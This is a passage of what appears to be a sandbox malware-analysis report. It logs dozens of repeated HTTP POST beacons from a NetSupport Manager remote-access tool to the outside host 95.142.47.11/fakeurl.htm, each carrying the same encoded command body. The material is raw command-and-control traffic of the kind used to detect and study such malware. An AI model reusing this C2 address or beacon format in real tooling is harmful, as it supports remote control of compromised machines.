                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.812813997 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.914006948 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.014794111 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.115775108 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.215832949 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.316905975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.417774916 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.518754005 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.618829012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.718816042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.819761992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:32.920761108 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:33.020808935 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:33.121893883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:33.222771883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:33.423871040 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:33.524775982 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:33.626298904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:33.725756884 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:33.825810909 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:33.926750898 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.026774883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.127770901 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.227797985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.331943989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.432821989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.533827066 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.633812904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.734781981 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.834799051 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:34.934753895 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.035798073 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.135833025 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.237210035 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.342678070 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.443799019 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.544840097 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.645773888 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.746802092 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.847791910 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:35.947741985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.048763037 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.148753881 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.249751091 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.349745989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.449980021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.550050020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.650753021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.750775099 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.850775003 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.951764107 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.051767111 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.151751041 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.252743959 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.352787971 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.453810930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.553745985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.755733013 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.856729031 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.956767082 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.057740927 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.157753944 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.258771896 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.359801054 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.460994005 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.560802937 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.661788940 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.762058020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.862804890 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.963923931 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.063750982 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
